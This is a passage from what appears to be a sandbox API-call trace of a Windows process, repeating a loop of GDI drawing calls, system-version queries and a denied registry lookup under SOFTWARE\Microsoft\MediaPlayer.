lpRect=0x1817ac) returned 0 [0087.909] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.909] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.909] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.909] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.909] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xce0401d3 [0087.909] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcc0401d6 [0087.909] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040db6 [0087.909] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040db7 [0087.909] CombineRgn (hrgnDst=0x1040db6, hrgnSrc1=0xce0401d3, hrgnSrc2=0xcc0401d6, iMode=1) returned 1 [0087.909] CombineRgn (hrgnDst=0x1040db7, hrgnSrc1=0xce0401d3, hrgnSrc2=0xcc0401d6, iMode=4) returned 2 [0087.909] CreateSolidBrush (color=0xff) returned 0x2100db5 [0087.909] CreateSolidBrush (color=0xff0000) returned 0x1100db8 [0087.909] DeleteObject (ho=0x1100db8) returned 1 [0087.909] DeleteObject (ho=0xcc0401d6) returned 1 [0087.909] DeleteObject (ho=0xce0401d3) returned 1 [0087.909] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.909] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.909] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.909] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.909] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.909] BeginPath (hdc=0x0) returned 0 [0087.909] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.909] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.910] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.910] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.910] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.910] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.910] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.910] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.910] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcd0401d6 [0087.910] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcf0401d3 [0087.910] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040db9 [0087.910] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dba [0087.910] CombineRgn (hrgnDst=0x1040db9, hrgnSrc1=0xcd0401d6, hrgnSrc2=0xcf0401d3, iMode=1) returned 1 [0087.910] CombineRgn (hrgnDst=0x1040dba, hrgnSrc1=0xcd0401d6, hrgnSrc2=0xcf0401d3, iMode=4) returned 2 [0087.910] CreateSolidBrush (color=0xff) returned 0x2100db8 [0087.910] CreateSolidBrush (color=0xff0000) returned 0x1100dbb [0087.910] DeleteObject (ho=0x1100dbb) returned 1 [0087.910] DeleteObject (ho=0xcf0401d3) returned 1 [0087.910] DeleteObject (ho=0xcd0401d6) returned 1 [0087.910] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.910] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.910] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.910] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.910] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.910] BeginPath (hdc=0x0) returned 0 [0087.910] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.910] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.910] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.910] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.910] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.910] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.910] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.910] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.910] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd00401d3 [0087.910] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xce0401d6 [0087.911] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dbc [0087.911] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dbd [0087.911] CombineRgn (hrgnDst=0x1040dbc, hrgnSrc1=0xd00401d3, hrgnSrc2=0xce0401d6, iMode=1) returned 1 [0087.911] CombineRgn (hrgnDst=0x1040dbd, hrgnSrc1=0xd00401d3, hrgnSrc2=0xce0401d6, iMode=4) returned 2 [0087.911] CreateSolidBrush (color=0xff) returned 0x2100dbb [0087.911] CreateSolidBrush (color=0xff0000) returned 0x1100dbe [0087.911] DeleteObject (ho=0x1100dbe) returned 1 [0087.911] DeleteObject (ho=0xce0401d6) returned 1 [0087.911] DeleteObject (ho=0xd00401d3) returned 1 [0087.911] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.911] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.911] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.911] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.911] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.911] BeginPath (hdc=0x0) returned 0 [0087.911] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.911] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.911] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.911] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.911] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.911] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.911] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.911] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.911] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcf0401d6 [0087.911] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd10401d3 [0087.911] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dbf [0087.911] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dc0 [0087.911] CombineRgn (hrgnDst=0x1040dbf, hrgnSrc1=0xcf0401d6, hrgnSrc2=0xd10401d3, iMode=1) returned 1 [0087.911] CombineRgn (hrgnDst=0x1040dc0, hrgnSrc1=0xcf0401d6, hrgnSrc2=0xd10401d3, iMode=4) returned 2 [0087.911] CreateSolidBrush (color=0xff) returned 0x2100dbe [0087.911] CreateSolidBrush (color=0xff0000) returned 0x1100dc1 [0087.911] DeleteObject (ho=0x1100dc1) returned 1 [0087.911] DeleteObject (ho=0xd10401d3) returned 1 [0087.911] DeleteObject (ho=0xcf0401d6) returned 1 [0087.911] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.911] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.912] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.912] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.912] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.912] BeginPath (hdc=0x0) returned 0 [0087.912] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.912] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.912] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.912] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.912] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.912] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.912] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.912] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.912] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd20401d3 [0087.912] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd00401d6 [0087.912] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dc2 [0087.912] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dc3 [0087.912] CombineRgn (hrgnDst=0x1040dc2, hrgnSrc1=0xd20401d3, hrgnSrc2=0xd00401d6, iMode=1) returned 1 [0087.912] CombineRgn (hrgnDst=0x1040dc3, hrgnSrc1=0xd20401d3, hrgnSrc2=0xd00401d6, iMode=4) returned 2 [0087.912] CreateSolidBrush (color=0xff) returned 0x2100dc1 [0087.912] CreateSolidBrush (color=0xff0000) returned 0x1100dc4 [0087.912] DeleteObject (ho=0x1100dc4) returned 1 [0087.912] DeleteObject (ho=0xd00401d6) returned 1 [0087.912] DeleteObject (ho=0xd20401d3) returned 1 [0087.912] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.912] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.912] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.912] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.912] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.912] BeginPath (hdc=0x0) returned 0 [0087.912] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.912] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.912] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.912] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.912] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.912] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.912] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.912] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.913] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd10401d6 [0087.913] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd30401d3 [0087.913] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dc5 [0087.913] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dc6 [0087.913] CombineRgn (hrgnDst=0x1040dc5, hrgnSrc1=0xd10401d6, hrgnSrc2=0xd30401d3, iMode=1) returned 1 [0087.913] CombineRgn (hrgnDst=0x1040dc6, hrgnSrc1=0xd10401d6, hrgnSrc2=0xd30401d3, iMode=4) returned 2 [0087.913] CreateSolidBrush (color=0xff) returned 0x2100dc4 [0087.913] CreateSolidBrush (color=0xff0000) returned 0x1100dc7 [0087.913] DeleteObject (ho=0x1100dc7) returned 1 [0087.913] DeleteObject (ho=0xd30401d3) returned 1 [0087.913] DeleteObject (ho=0xd10401d6) returned 1 [0087.913] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.913] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.913] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.913] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.913] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.913] BeginPath (hdc=0x0) returned 0 [0087.913] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.913] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.913] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.913] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.913] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.913] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.913] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.913] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.913] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd40401d3 [0087.913] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd20401d6 [0087.913] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dc8 [0087.913] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dc9 [0087.913] CombineRgn (hrgnDst=0x1040dc8, hrgnSrc1=0xd40401d3, hrgnSrc2=0xd20401d6, iMode=1) returned 1 [0087.913] CombineRgn (hrgnDst=0x1040dc9, hrgnSrc1=0xd40401d3, hrgnSrc2=0xd20401d6, iMode=4) returned 2 [0087.913] CreateSolidBrush (color=0xff) returned 0x2100dc7 [0087.913] CreateSolidBrush (color=0xff0000) returned 0x1100dca [0087.913] DeleteObject (ho=0x1100dca) returned 1 [0087.913] DeleteObject (ho=0xd20401d6) returned 1 [0087.913] DeleteObject (ho=0xd40401d3) returned 1 [0087.914] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.914] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.914] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.914] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.914] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.914] BeginPath (hdc=0x0) returned 0 [0087.914] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.914] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.914] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.914] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.914] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.914] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.914] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.914] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.914] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd30401d6 [0087.914] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd50401d3 [0087.914] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dcb [0087.914] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dcc [0087.914] CombineRgn (hrgnDst=0x1040dcb, hrgnSrc1=0xd30401d6, hrgnSrc2=0xd50401d3, iMode=1) returned 1 [0087.914] CombineRgn (hrgnDst=0x1040dcc, hrgnSrc1=0xd30401d6, hrgnSrc2=0xd50401d3, iMode=4) returned 2 [0087.914] CreateSolidBrush (color=0xff) returned 0x2100dca [0087.914] CreateSolidBrush (color=0xff0000) returned 0x1100dcd [0087.914] DeleteObject (ho=0x1100dcd) returned 1 [0087.914] DeleteObject (ho=0xd50401d3) returned 1 [0087.914] DeleteObject (ho=0xd30401d6) returned 1 [0087.914] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.914] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.914] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.914] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.914] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.914] BeginPath (hdc=0x0) returned 0 [0087.914] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.914] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.914] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.914] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.914] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.914] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.915] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.915] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.915] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd60401d3 [0087.915] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd40401d6 [0087.915] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dce [0087.915] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dcf [0087.915] CombineRgn (hrgnDst=0x1040dce, hrgnSrc1=0xd60401d3, hrgnSrc2=0xd40401d6, iMode=1) returned 1 [0087.915] CombineRgn (hrgnDst=0x1040dcf, hrgnSrc1=0xd60401d3, hrgnSrc2=0xd40401d6, iMode=4) returned 2 [0087.915] CreateSolidBrush (color=0xff) returned 0x2100dcd [0087.915] CreateSolidBrush (color=0xff0000) returned 0x1100dd0 [0087.915] DeleteObject (ho=0x1100dd0) returned 1 [0087.915] DeleteObject (ho=0xd40401d6) returned 1 [0087.915] DeleteObject (ho=0xd60401d3) returned 1 [0087.915] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.915] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.915] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.915] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.915] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.915] BeginPath (hdc=0x0) returned 0 [0087.915] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.915] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.915] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.915] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.915] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.915] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.915] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.915] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.915] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd50401d6 [0087.915] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd70401d3 [0087.915] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dd1 [0087.915] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dd2 [0087.916] CombineRgn 